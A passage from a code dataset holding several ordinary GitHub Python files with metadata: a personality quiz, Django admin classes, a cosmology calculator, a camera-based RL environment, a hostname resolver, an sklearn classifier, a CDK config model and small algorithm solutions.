the right trait\n\t# If it was less, subtract from 100 then use left trait\n\t# If it was equal to 50%, add 50% to both traits\n\tfor question in question_list:\n\t\tvalue = 0\n\t\tif question.value > 50:\n\t\t\ttrait = question.right_trait\n\t\t\tvalue = question.value\n\t\t\tresults[trait] += value\n\t\t\tresults[question.left_trait] += (100-value)\n\t\telif question.value < 50:\n\t\t\ttrait = question.left_trait\n\t\t\tvalue = 100 - question.value\n\t\t\tresults[trait] += value\n\t\t\tresults[question.right_trait] += (100-value)\n\t\telse:\n\t\t\ttrait = str(question.left_trait + \" and \" + question.right_trait)\n\t\t\tvalue = 50\n\t\t\tresults[question.left_trait] += value\n\t\t\tresults[question.right_trait] += value\n\n\t# These are the raw score results for each of the categories\n\t# print(results)\n\n\t# Calculate the percentage scores for each of the 8 categories\n\tfor key in results:\n\t\tresults[key] = results[key]/(len(question_list)/4)\n\n\t# Combine the relevant categories into a final set of scores\n\ti = 0\n\twhile i < 8:\n\t\tif results[types[i]] > results[types[i+1]]:\n\t\t\tpersonality_type[types[i]] = str(results[types[i]]) + '%'\n\t\t\tpersonality_code = personality_code + symbols[types[i]]\n\t\telif results[types[i+1]] > results[types[i]]:\n\t\t\tpersonality_type[types[i+1]] = str(results[types[i+1]]) + '%'\n\t\t\tpersonality_code = personality_code + symbols[types[i+1]]\n\t\telse:\n\t\t\tpersonality_type[str(types[i] + ' ' + types[i+1])] = '50%'\n\t\ti += 2\n\n\t# Pretend to be calculating :)\n\tfor x in range(50):\n\t\tprint_progress(x, 50, 'Calculating your results: ')\n\t\ttime.sleep(.1)\n\n\n\t# Print the individual's results\n\tprint('')\n\tprint('Your Meyers-Briggs personality type is: ' + personality_code)\n\tprint('')\n\tprint('Here are your detailed results: ')\n\tfor key in personality_type:\n\t\tprint(key + ': ' + personality_type[key])\n\n\tprint('')\n\tprint('Your choices were: ' + str(answers))\n\n# Print iterations progress\n# Obtained from https://gist.github.com/aubricus/f91fb55dc6ba5557fbab06119420dd6a\ndef print_progress(iteration, total, prefix='', suffix='', decimals=1, bar_length=50):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n bar_length - Optional : character length of bar (Int)\n \"\"\"\n str_format = \"{0:.\" + str(decimals) + \"f}\"\n percents = str_format.format(100 * (iteration / float(total)))\n filled_length = int(round(bar_length * iteration / float(total)))\n bar = '█' * filled_length + '-' * (bar_length - filled_length)\n\n print('\\r%s |%s| %s%% %s' % (prefix, bar, percents, suffix), end = '\\r'),\n\n if iteration > total:\n print('\\n')\n\nclass Question():\n\n\tdef __init__(self, question, q_type, left_attr, right_attr, value, left_trait, right_trait):\n\t\tself.question = str(question)\n\t\tself.q_type = q_type\n\t\tself.left_attr = str(left_attr)\n\t\tself.right_attr = str(right_attr)\n\t\tself.value = str(value)\n\t\tself.left_trait = left_trait\n\t\tself.right_trait = right_trait\n\n\tdef get_question(self):\n\t\treturn str(self.question)\n\n\tdef get_type(self):\n\t\treturn str(self.q_type)\n\n\tdef get_left(self):\n\t\treturn self.left_attr\n\n\tdef get_right(self):\n\t\treturn self.right_attr\n\n\tdef set_value(self, value):\n\t\tself.value = value\n\n\tdef get_value(self):\n\t\treturn str(self.value) + \"%\"\n\n\tdef print(self):\n\t\t# TODO\n\t\tpass\n\n\nmrl1_5 = [2, 2, 4, 5, 3, 4, 5, 5, 2, 1, 2, 4, 5, 3, 4, 5, 2, 4, 2, 4, 5, 2, 3, 5]\nmrl = [2, 3, 6, 7, 3, 6, 6, 7, 2, 2, 2, 6, 7, 3, 4, 6, 3, 3, 2, 6, 7, 2, 5, 6]\ncozza = [4, 6, 7, 6, 2, 5, 7, 6, 5, 7, 3, 7, 6, 3, 6, 6, 7, 2, 1, 7, 6, 3, 4, 4]\nmal = [6, 7, 1, 3, 7, 2, 7, 6, 2, 3, 5, 6, 7, 5, 2, 6, 2, 2, 6, 2, 5, 7, 7, 4]\nd = [4, 7, 5, 5, 2, 5, 2, 6, 2, 6, 2, 7, 5, 6, 5, 6, 1, 3, 4, 6, 3, 2, 7, 6]\n\npersonality(mrl)\n","repo_name":"jlehenbauer/python-projects-public","sub_path":"personality.py","file_name":"personality.py","file_ext":"py","file_size_in_byte":9145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18239347263","text":"from django.db.models import Q\nfrom django.contrib import admin\nfrom django.contrib.admin import SimpleListFilter\nfrom django.utils import timezone\n\nfrom api import models as models_api\n\nfrom ..models import BaseAdminModel, BaseInlineAdminModel, DEFAULT_READONLY\n\n\nclass OrderReservationValidFilter(SimpleListFilter):\n title = 'Time valid'\n parameter_name = 'time_valid'\n\n def lookups(self, request, model_admin):\n return [\n (1, 'Yes'),\n (2, 'No'),\n ]\n\n def queryset(self, request, queryset):\n if self.value() == '1':\n return queryset.filter(\n reservation__ends_at__gt=timezone.now(),\n )\n if self.value() == '2':\n return queryset.filter(\n Q(reservation__ends_at__lte=timezone.now()) |\n Q(reservation__ends_at__isnull=True)\n )\n\n\nclass MealReservationInlineAdmin(BaseInlineAdminModel):\n \"\"\"Admin model for MealReservation.\"\"\"\n\n model = models_api.MealReservation\n\n\nclass ReservationAdmin(BaseAdminModel):\n \"\"\"Admin model for Reservations.\"\"\"\n readonly_fields = ('participant_link', 'checkin_link')\n list_display = (\n 'id',\n 'participant_link',\n 'order_link',\n 'workshop',\n 'accomodation',\n 'price',\n 'ends_at',\n 'is_valid',\n )\n list_filter = (\n 'order__year',\n 'order__confirmed',\n 'order__canceled',\n 'order__paid',\n 'meals',\n )\n inlines = [MealReservationInlineAdmin]\n autocomplete_fields = ('workshop_price', 'order',)\n search_fields = [\n 'order__participant__name',\n 'order__year__year',\n 'accomodation__name',\n 'workshop_price__workshop__name',\n 'order__price'\n ]\n\n\nclass ReservationInlineAdmin(admin.StackedInline):\n \"\"\"Inline admin model for Reservations.\"\"\"\n model = models_api.Reservation\n\n\nclass OrderAdmin(BaseAdminModel):\n \"\"\"Admin model for Orders.\"\"\"\n\n list_display = (\n 'symvar',\n 'participant_link',\n 'reservation_link',\n 'price',\n 'total_amount_received',\n 'is_valid',\n 'canceled',\n 'paid',\n 'created_at',\n 'valid_until',\n )\n list_filter = (\n 'year',\n 'paid',\n 'confirmed',\n 'over_paid',\n 'canceled',\n OrderReservationValidFilter,\n )\n list_select_related = True\n autocomplete_fields = ['participant']\n fields = [\n 'year',\n 'participant',\n 'symvar',\n 'checkin_link',\n 'accomodation_info',\n 'confirmed',\n 'canceled',\n 'paid',\n 'over_paid',\n 'price',\n 'created_at',\n 'updated_at',\n ]\n search_fields = [\n 'participant__name',\n 'participant__team__name',\n 'price',\n 'reservation__accomodation__name',\n 'reservation__workshop_price__workshop__name',\n 'symvar',\n ]\n inlines = [ReservationInlineAdmin]\n\n def get_readonly_fields(self, request, obj=None):\n if obj:\n return [\n 'participant',\n 'symvar',\n 'total_amount_received',\n 'checkin_link',\n ] + DEFAULT_READONLY\n return [\n 'symvar',\n 'total_amount_received',\n 'checkin_link',\n ] + DEFAULT_READONLY\n\n\nclass PaymentAdmin(BaseAdminModel):\n \"\"\"Admin model for Food and its photos.\"\"\"\n list_display = (\n 'ident',\n 'order',\n 'user_identification',\n 'symvar',\n 'symcon',\n 'symspc',\n 'amount',\n 'sender',\n 'bank',\n 'message',\n 'currency',\n 'received_at',\n )\n list_filter = ('bank',)\n\n def get_readonly_fields(self, request, obj=None):\n \"\"\"Define all read only fields.\"\"\"\n if obj:\n return DEFAULT_READONLY + [\n 'ident',\n 'symvar',\n 'symcon',\n 'symspc',\n 'amount',\n 'sender',\n 'bank',\n 'message',\n 'currency',\n 'received_at',\n ]\n return super(PaymentAdmin, self).get_readonly_fields(\n request,\n obj,\n )\n\n\nclass MealReservationAdmin(BaseAdminModel):\n \"\"\"Admin model for Meal Reservations.\"\"\"\n readonly_fields = (\n 'participant_link',\n 'checkin_link',\n 'reservation',\n 'meal',\n )\n list_display = (\n 'id',\n 'participant_link',\n 'order_link',\n 'reservation_link',\n 'meal',\n 'food',\n 'soup',\n )\n list_filter = (\n 'reservation__order__year',\n 'reservation__order__confirmed',\n 'reservation__order__canceled',\n 'reservation__order__paid',\n )\n autocomplete_fields = ('reservation', 'meal', 'food', 'soup')\n search_fields = [\n 'meal__name',\n 'food__name',\n 'soup__name',\n 'reservation__order__participant__name',\n ]\n","repo_name":"just-paja/festival-api","sub_path":"api_admin/admin/orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":5073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5642733683","text":"#!/usr/bin/env python \n\nimport numpy as np\nfrom ..astro import angsep\nfrom ..utils import isiterable, vectorize_if_needed\nfrom scipy.integrate import quad\nWMAP9 = [0.693, 0.287, 1.0-0.287]\n\nclass Cosmology:\n \"\"\"\n Class for calculating common cosmological quantities\n \"\"\"\n def __init__(self, params=WMAP9):\n self.h, self.omegaM0, self.omegaL0 = params\n self.H0 = 100.0*self.h # km/s/Mpc\n self.c = 2.99792458e5 # km/s\n self.G = 4.302113488372941e-09 # km2 Mpc / (M_sun s2)\n self.DH = self.c/self.H0\n\n def E(self, z):\n \"\"\"\n the ratio of the Hubble parameter at redshift z to\n its present value\n \"\"\"\n if isiterable(z):\n z = np.asarray(z)\n return np.sqrt(self.omegaM0*(1.0+z)**3 + self.omegaL0)\n\n def rhocrit(self, z):\n \"\"\"\n critical density in units of Msun Mpc^-3\n \"\"\"\n if isiterable(z):\n z = np.asarray(z)\n return (3.0*(self.H0*self.E(z))**2)/(8*np.pi*self.G) \n\n def com_dist(self, z):\n \"\"\"\n comoving distance as a function of z\n \"\"\"\n func = lambda z: quad(lambda z : 1.0/self.E(z), 0, z)[0]\n return self.DH*vectorize_if_needed(func, z)\n\n def D_L(self, z):\n \"\"\"\n angular diameter distance as a function of z\n \"\"\"\n if isiterable(z):\n z = np.asarray(z)\n return self.com_dist(z)*(1.0 + z)\n\n def D_A(self, z):\n \"\"\"\n angular diameter distance as a function of z\n \"\"\"\n if isiterable(z):\n z = np.asarray(z)\n return self.com_dist(z) / (1.0 + z)\n\n def com_sep(self, coord3d_1, coord3d_2):\n \"\"\"\n comoving separation between two galaxies \n \"\"\"\n for i in range(3):\n if isiterable(coord3d_1[i]):\n coord3d_1[i] = np.asarray(coord3d_1[i])\n if isiterable(coord3d_2[i]):\n coord3d_2[i] = np.asarray(coord3d_2[i])\n ra1, dec1, z1 = coord3d_1\n ra2, dec2, z2 = coord3d_2\n Dc1 = self.com_dist(z1)\n Dc2 = self.com_dist(z2)\n theta = angsep(ra1, dec1, ra2, dec2, sepunits='radian')\n sep = np.sqrt(Dc1**2 + Dc2**2 - 2.0*Dc1*Dc2*np.cos(theta))\n return sep \n","repo_name":"johnnygreco/toolbox","sub_path":"toolbox/cosmo/cosmo.py","file_name":"cosmo.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27544353225","text":"import cv2\nimport logging\nimport numpy as np\nimport gym\nimport time\nfrom gym import spaces\nfrom multiprocessing import Array, Value\n\nfrom senseact.devices.real_sense.real_sense_communicator import RealSenseCommunicator\nfrom senseact.devices.ur import ur_utils\nfrom senseact.devices.ur.ur_setups import setups\nfrom senseact.rtrl_base_env import RTRLBaseEnv\nfrom senseact.sharedbuffer import SharedBuffer\nfrom senseact import utils\n\n\nclass RealSenseEnv(RTRLBaseEnv, gym.core.Env):\n def __init__(self,\n camera_res=(3, 480, 640),\n time_limit=10,\n hosts=('localhost',),\n ports=(5000,),\n rng=np.random,\n **kwargs):\n assert time_limit > 0\n assert len(hosts) == len(ports)\n\n self.num_cameras = len(hosts)\n self.buffer_len = 2\n self.action_dim = 2\n self.camera_dim = int(np.product(camera_res))\n self.input_dim = self.num_cameras * self.camera_dim\n self.camera_res = camera_res\n\n self._time_limit = time_limit\n\n self.rng = rng\n\n self._action_space = spaces.Discrete(2)\n self._observation_space = spaces.Box(\n low=0, high=1, shape=(self.input_dim,), dtype=np.float32)\n\n # Setup communicator and buffer\n communicator_setups = {}\n self._camera_images_ = {}\n\n for idx, (host, port) in enumerate(zip(hosts, ports)):\n communicator_setups[f'Camera_{idx}'] = {\n 'Communicator': RealSenseCommunicator,\n # have to read in this number of packets everytime to support\n # all operations\n 'num_sensor_packets': self.buffer_len,\n 'kwargs': {\n 'host': host,\n 'port': port,\n 'num_channels': camera_res[0],\n 'height': camera_res[1],\n 'width': camera_res[2]\n }\n }\n\n self._camera_images_[f'Camera_{idx}'] = np.frombuffer(\n Array('f', self.camera_dim).get_obj(), dtype='float32')\n\n super(RealSenseEnv, self).__init__(\n communicator_setups=communicator_setups,\n action_dim=self.action_dim,\n observation_dim=self.input_dim,\n **kwargs\n )\n\n self._obs_ = np.zeros(shape=self.input_dim)\n self.episode_steps = Value('i', 0)\n\n def _reset_(self):\n self.done = False\n self.episode_steps.value = 0\n self._sensor_to_sensation_()\n\n def _compute_sensation_(self, name, sensor_window, timestamp_window, index_window):\n if name.startswith('Camera'):\n image = np.array(sensor_window[-1])\n camera_idx = int(name.split(\"_\")[1])\n np.copyto(self._camera_images_[name], image.flatten())\n np.copyto(self._obs_[camera_idx * self.camera_dim:(camera_idx + 1) * self.camera_dim], image.flatten())\n \n reward = self._compute_reward()\n \n return np.concatenate((self._obs_, [reward], [self.done]))\n\n def _compute_actuation_(self, action, timestamp, index):\n if action[1]:\n self.done = True\n\n def _check_done(self, env_done):\n self.episode_steps.value += 1\n return env_done or (self._time_limit < self.episode_steps.value)\n\n def _compute_reward(self):\n return self.rng.normal(loc=0, scale=self.episode_steps.value)\n\n @property\n def observation_space(self):\n return self._observation_space\n\n @property\n def action_space(self):\n return self._action_space\n\n def render(self):\n cv2.namedWindow('RealSense', cv2.WINDOW_AUTOSIZE)\n images = []\n for idx in range(self.num_cameras):\n images.append(self._camera_images_[f'Camera_{idx}'].reshape(self.camera_res).transpose(1, 2, 0))\n images = np.hstack(images)\n cv2.imshow('RealSense', images)\n cv2.waitKey(1)\n\n def terminate(self):\n \"\"\"Gracefully terminates environment processes.\"\"\"\n super(RealSenseEnv, self).close()\n\n\nif __name__ == \"__main__\":\n hosts = ('localhost',)\n ports = (5000,)\n env = RealSenseEnv(\n time_limit=10,\n hosts=hosts,\n ports=ports)\n env.start()\n \n for episode in range(10):\n print(f\"Episode: {episode}\")\n done = False\n obs = env.reset()\n while not done:\n env.render()\n obs, reward, done, _ = env.step([1, 0])\n\n env.close()\n","repo_name":"utiasSTARS/robust-latent-srl","sub_path":"env/senseact/senseact/envs/real_sense/real_sense_env.py","file_name":"real_sense_env.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"6493212052","text":"from tensorflow import keras\n\n\ndef main():\n model = keras.models.load_model('models/py/model.h5', compile=False)\n print(\"Model has been loaded !\")\n\n model.compile()\n print(model.inputs[0].dtype)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MirrorMaru/UQAC_SL_translator","sub_path":"sign_language_detection/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4647893570","text":"import socket\r\nreader=open(\"host.txt\",\"r\")\r\nout=open(\"ip.txt\",\"w\")\r\nfor host in reader.read().split('\\n'):\r\n\ttry:\r\n\t\tip=socket.gethostbyname(host)\r\n\texcept:\r\n\t\tip=\"N/A\"\r\n\tout.write(ip)\r\n\tout.write(\"\\n\")\r\nout.close()\r\nreader.close()","repo_name":"gm09519/host2ip","sub_path":"host2ip.py","file_name":"host2ip.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"20778083182","text":"import json\nimport numpy as np\nimport numpy.random as nr\nimport scipy\nfrom sklearn import svm\nfrom sklearn import mixture\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.externals import joblib\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import log_loss\n\n\"\"\"\nLoad training set\n\"\"\"\ndata_train_path = './deeplearning/feature/acoustic/data_train_ALL_300_concat.txt'\ndata_train = []\nwith open(data_train_path, 'r') as from_training_data_file:\n data_train = json.load(from_training_data_file)\n\n# Pre-process Train Dataset\ntrain_videos = []\nX_train = []\ny_train = []\nfor sample in data_train:\n train_videos.append(sample[0])\n y_train.append(sample[1])\n X_train.append(sample[2])\n\n\"\"\"\nLoad validation set\n\"\"\"\ndata_test_path = './deeplearning/feature/acoustic/data_test_ALL_300_concat.txt'\ndata_test = []\nwith open(data_test_path, 'r') as from_test_data_file:\n data_test = json.load(from_test_data_file)\n\n# Pre-process Test Dataset\ntest_videos = []\nX_test = []\ny_test = []\nfor sample in data_test:\n test_videos.append(sample[0])\n y_test.append(sample[1])\n X_test.append(sample[2])\n\ncheck_output_file = open('output_stuff.txt', 'w')\ncheck_output_file.write(str(y_test))\ncheck_output_file.write(str(X_test))\ncheck_output_file.close()\n\n\"\"\"\nTrain our model using...\nGMM\nand Evaluate on validation set\n\nREMEMBER TO CHANGE THE OUTPUT FILE NAME. n100 (the portion at the\nback of the name is n_estimators)\n\"\"\"\n# multi_class_classifier = mixture.GMM(n_components=25).fit(X_train, y_train)\nmulti_class_classifier = RandomForestClassifier(n_estimators=500).fit(X_train, y_train)\n\n# Evaluate on Train set\nprint(\"\\nTraining Data (in-sample) scores and classification_report: \")\nprint(str(multi_class_classifier.score(X_train, y_train)))\nmulti_class_classifier_probs = multi_class_classifier.predict_proba(X_test)\nsig_score = log_loss(y_test, multi_class_classifier_probs)\nprint(\"\\nsig_score: \" + str(sig_score) + \"\\n\")\nprint(classification_report(y_train, multi_class_classifier.predict(X_train), target_names=None))\n\n# Our prediction\ntest_prediction = multi_class_classifier.predict(X_test)\nprint(test_prediction, len(test_prediction))\n\n# Export and save the model for future use so you don't need to train again\n# joblib.dump(multi_class_classifier, 'model.pkl', compress=9)\n\n# Evaluate on Test set - Results written to disk\n# Output classification_report and accuracy in-sample and out-of-sample\ncheck_output_file = open(data_test_path + '-scores-forests-n500.txt', 'w')\ncheck_output_file.write(str(multi_class_classifier.score(X_test, y_test)))\ncheck_output_file.write(classification_report(y_test, test_prediction, target_names=None))\ncheck_output_file.close()\n\"\"\"\ncheck_output_file = open('output_predict_probab.txt', 'w')\ncheck_output_file.write(\"\\n\")\ncheck_output_file.write(str(list(multi_class_classifier.predict_proba(X_test))))\ncheck_output_file.write(\"\\n Predict Proba len\")\ncheck_output_file.write(str(len(multi_class_classifier.predict_proba(X_test))))\ncheck_output_file.write(\"\\n Predict Proba len 1st\")\ncheck_output_file.write(str(len(multi_class_classifier.predict_proba(X_test)[0])))\ncheck_output_file.close()\n\"\"\"\n","repo_name":"NatashaKSS/CS2108","sub_path":"Ass2/classify_video_venue_final_GMM_forests.py","file_name":"classify_video_venue_final_GMM_forests.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74203821287","text":"from typing import Any, Dict, List, Union\n\nimport pydantic\nimport yaml\nfrom aws_cdk import aws_ec2\nfrom pydantic_core.core_schema import FieldValidationInfo\nfrom pydantic_settings import BaseSettings\n\n\nclass AppConfig(BaseSettings):\n project_id: str = pydantic.Field(\n description=\"Project ID\", default=\"eoapi-template-demo\"\n )\n stage: str = pydantic.Field(description=\"Stage of deployment\", default=\"test\")\n # because of its validator, `tags` should always come after `project_id` and `stage`\n tags: Dict[str, str] | None = pydantic.Field(\n description=\"\"\"Tags to apply to resources. If none provided, \n will default to the defaults defined in `default_tags`.\n Note that if tags are passed to the CDK CLI via `--tags`, \n they will override any tags defined here.\"\"\",\n default=None,\n )\n auth_provider_jwks_url: str | None = pydantic.Field(\n description=\"\"\"Auth Provider JSON Web Key Set URL for\n ingestion authentication. If not provided, \n no authentication will be required.\"\"\",\n default=None,\n )\n data_access_role_arn: str | None = pydantic.Field(\n description=\"\"\"Role ARN for data access, that will be\n used by the STAC ingestor for validation of assets\n located in S3 and for the tiler application to access\n assets located in S3. If none, the role will be\n created at runtime with full S3 read access. If\n provided, the existing role must be configured to\n allow the tiler and STAC ingestor lambda roles to\n assume it. See https://github.com/developmentseed/eoapi-cdk\"\"\",\n default=None,\n )\n db_instance_type: str = pydantic.Field(\n description=\"Database instance type\", default=\"t3.micro\"\n )\n db_allocated_storage: int = pydantic.Field(\n description=\"Allocated storage for the database\", default=5\n )\n public_db_subnet: bool = pydantic.Field(\n description=\"Whether to put the database in a public subnet\", default=True\n )\n nat_gateway_count: int = pydantic.Field(\n description=\"Number of NAT gateways to create\",\n default=0,\n )\n bastion_host: bool = pydantic.Field(\n description=\"\"\"Whether to create a bastion host. It can typically \n be used to make administrative connections to the database if \n `public_db_subnet` is False\"\"\",\n default=False,\n )\n bastion_host_create_elastic_ip: bool = pydantic.Field(\n description=\"\"\"Whether to create an elastic IP for the bastion host.\n Ignored if `bastion_host` equals `False`\"\"\",\n default=False,\n )\n bastion_host_allow_ip_list: List[str] = pydantic.Field(\n description=\"\"\"YAML file containing list of IP addresses to \n allow SSH access to the bastion host. Ignored if `bastion_host`\n equals `False`.\"\"\",\n default=[],\n )\n bastion_host_user_data: Union[Dict[str, Any], aws_ec2.UserData] = pydantic.Field(\n description=\"\"\"Path to file containing user data for the bastion host.\n Ignored if `bastion_host` equals `False`.\"\"\",\n default=aws_ec2.UserData.for_linux(),\n )\n titiler_buckets: List[str] = pydantic.Field(\n description=\"\"\"Path to YAML file containing list of\n buckets to grant access to the titiler API\"\"\",\n default=[],\n )\n acm_certificate_arn: str | None = pydantic.Field(\n description=\"\"\"ARN of ACM certificate to use for \n custom domain names. If provided,\n CDNs are created for all the APIs\"\"\",\n default=None,\n )\n stac_api_custom_domain: str | None = pydantic.Field(\n description=\"\"\"Custom domain name for the STAC API. \n Must provide `acm_certificate_arn`\"\"\",\n default=None,\n )\n titiler_pgstac_api_custom_domain: str | None = pydantic.Field(\n description=\"\"\"Custom domain name for the titiler pgstac API. \n Must provide `acm_certificate_arn`\"\"\",\n default=None,\n )\n stac_ingestor_api_custom_domain: str | None = pydantic.Field(\n description=\"\"\"Custom domain name for the STAC ingestor API.\n Must provide `acm_certificate_arn`\"\"\",\n default=None,\n )\n tipg_api_custom_domain: str | None = pydantic.Field(\n description=\"\"\"Custom domain name for the tipg API. \n Must provide `acm_certificate_arn`\"\"\",\n default=None,\n )\n stac_browser_version: str | None = pydantic.Field(\n description=\"\"\"Version of the Radiant Earth STAC browser to deploy.\n If none provided, no STAC browser will be deployed.\n If provided, `stac_api_custom_domain` must be provided\n as it will be used as a backend.\"\"\",\n default=None,\n )\n\n @pydantic.field_validator(\"tags\")\n def default_tags(cls, v, info: FieldValidationInfo):\n return v or {\"project_id\": info.data[\"project_id\"], \"stage\": info.data[\"stage\"]}\n\n @pydantic.model_validator(mode=\"after\")\n def validate_nat_gateway_count(self) -> \"AppConfig\":\n if not self.public_db_subnet and (\n self.nat_gateway_count is not None and self.nat_gateway_count <= 0\n ):\n raise ValueError(\n \"\"\"if the database and its associated services instances\n are to be located in the private subnet of the VPC, NAT\n gateways are needed to allow egress from the services\n and therefore `nat_gateway_count` has to be > 0.\"\"\"\n )\n else:\n return self\n\n @pydantic.model_validator(mode=\"after\")\n def validate_stac_browser_version(self) -> \"AppConfig\":\n if (\n self.stac_browser_version is not None\n and self.stac_api_custom_domain is None\n ):\n raise ValueError(\n \"\"\"If a STAC browser version is provided, \n a custom domain must be provided for the STAC API\"\"\"\n )\n else:\n return self\n\n @pydantic.model_validator(mode=\"after\")\n def validate_acm_certificate_arn(self) -> \"AppConfig\":\n if self.acm_certificate_arn is None and any(\n [\n self.stac_api_custom_domain,\n self.titiler_pgstac_api_custom_domain,\n self.stac_ingestor_api_custom_domain,\n self.tipg_api_custom_domain,\n ]\n ):\n raise ValueError(\n \"\"\"If any custom domain is provided, \n an ACM certificate ARN must be provided\"\"\"\n )\n else:\n return self\n\n def build_service_name(self, service_id: str) -> str:\n return f\"{self.project_id}-{self.stage}-{service_id}\"\n\n\ndef build_app_config() -> AppConfig:\n \"\"\"Builds the AppConfig object from config.yaml file if exists,\n otherwise use defaults\"\"\"\n try:\n with open(\"config.yaml\") as f:\n print(\"Loading config from config.yaml\")\n app_config = yaml.safe_load(f)\n app_config = (\n {} if app_config is None else app_config\n ) # if config is empty, set it to an empty dict\n app_config = AppConfig(**app_config)\n except FileNotFoundError:\n # if no config at the expected path, using defaults\n app_config = AppConfig()\n\n return app_config\n","repo_name":"developmentseed/eoapi-template","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":7307,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21451387495","text":"from typing import Dict, List\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n num_idx_map: Dict[int, int] = {}\n for idx, num in enumerate(nums):\n if target - num in num_idx_map.keys():\n return [num_idx_map[target-num], idx]\n else:\n num_idx_map[num] = idx\n return [0, 0]","repo_name":"jerrt2003/leetcode-in-python","sub_path":"1_Two_Sum/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14062799526","text":"# Author Hassan Alvi\n# Creation date : 20th July 2018\n\nfrom pin_py.utils.http import Requests\n\ntry:\n import simplejson as json\nexcept ImportError:\n import json\n\n\nclass PinPy:\n pinterest_url = \"https://api.pinterest.com/\"\n\n def __init__(self):\n self.request = Requests()\n self.all_pins = []\n pass\n\n def authorize(self, user_auth_token):\n\n query = \"v1/me?access_token={}\".format(user_auth_token)\n request = self.request.get(PinPy.pinterest_url + query)\n if request.status_code != 200:\n return None\n json_object = json.loads(request.text)\n # authorize user and if he authorizes, it returns a User Object\n # if he fails to authorize return null\n return json_object\n\n # it returns a dict of data about pin\n # in data attribute there is creator of pin, media type of pin\n # created_time of pin, board of pin, and analytics of its likes and comments\n\n def get_single_pin_details(self, pin_id, access_token):\n if pin_id is None or pin_id == '' or access_token is None or access_token == '':\n return ' pin_id or access_token is wrong'\n\n pinterest_url = 'https://api.pinterest.com/v1/pins/{0}/?access_token={1}&fields=counts,board,creator,' \\\n 'created_at,media,note'.format(pin_id, access_token)\n request = self.request.get(pinterest_url)\n if request.status_code != 200:\n json_object = json.loads(request.text)\n error = 'Status code is not 200 it is ' + str(request.status_code) + ' ' + json_object['message']\n return error, None\n\n json_object = json.loads(request.text)\n\n if 'data' not in json_object:\n return json_object['message'], None\n\n return json_object\n\n # Return the array of Pins, these are just ids of PINS and if you require specific detail of sme pin you need to\n # call get_details_of_all_pins and pass that pin ID\n def get_details_of_all_pins(self, user_auth_token):\n\n query = \"v1/me/pins?access_token={}\".format(user_auth_token)\n url = PinPy.pinterest_url + query\n\n while url is not None:\n request = self.request.get(url)\n if request.status_code != 200:\n return None\n\n json_object = json.loads(request.text)\n if \"data\" in json_object:\n for pin in json_object[\"data\"]:\n self.all_pins.append(pin[\"id\"])\n\n if \"page\" in json_object:\n url = json_object[\"page\"][\"next\"]\n #url = None # JUST FOR DEBUGGINJ\n else:\n url = None\n\n return self.all_pins\n\n # return a dict in which array of boards is embedded.\n # Typical board has following attributes URL, ID, NAME\n def get_all_boards_of_user(self, user_auth_token):\n query = \"v1/me/boards?access_token={}\".format(user_auth_token)\n request = self.request.get(PinPy.pinterest_url + query)\n if request.status_code != 200:\n return None\n json_object = json.loads(request.text)\n return json_object\n","repo_name":"d4interactive-archive/pinterest-api","sub_path":"pin_py/pinterest/pinpy.py","file_name":"pinpy.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27751315","text":"# 75%(こっちの方が簡潔でわかりやすい)\ndef solution(A):\n from collections import Counter\n falf = len(A) // 2\n # 奇数であればdominatorは「商+1」になる\n dominator_num = falf if len(A) % 2 == 0 else falf + 1\n\n counter = Counter(A)\n most_appear_num = max(counter, key=counter.get)\n # 出現回数が全体の要素数の半分未満の場合、−1を返す\n if dominator_num > counter[most_appear_num]:\n return -1\n\n # 配列の中で過半数を占める数字の最初に出てきたインデックスを返す\n for idx, i in enumerate(A):\n if most_appear_num == i:\n return idx\n\n\n# 100%だけどわかりにくい\ndef solution(A: [int]) -> int:\n if len(A) == 0:\n return -1\n\n a = [(i, v) for i, v in enumerate(A)]\n a.sort(key=lambda x: x[1])\n\n max_count = 0\n pre_i, pre_v = a[0]\n max_value_index = pre_i\n\n count = 0\n for i, v in a:\n if v == pre_v:\n count += 1\n else:\n if count > max_count:\n max_count = count\n max_value_index = pre_i\n count = 1\n pre_i, pre_v = i, v\n\n if count > max_count:\n max_count = count\n max_value_index = pre_i\n\n return max_value_index if max_count > len(A) / 2 else -1\n","repo_name":"mizutaninaoki/AtCoderPractice","sub_path":"codility/lessons/L08_dominator.py","file_name":"L08_dominator.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17455061618","text":"#https://www.acmicpc.net/problem/1141\nn = int(input())\nwords = []\nfor _ in range(n):\n 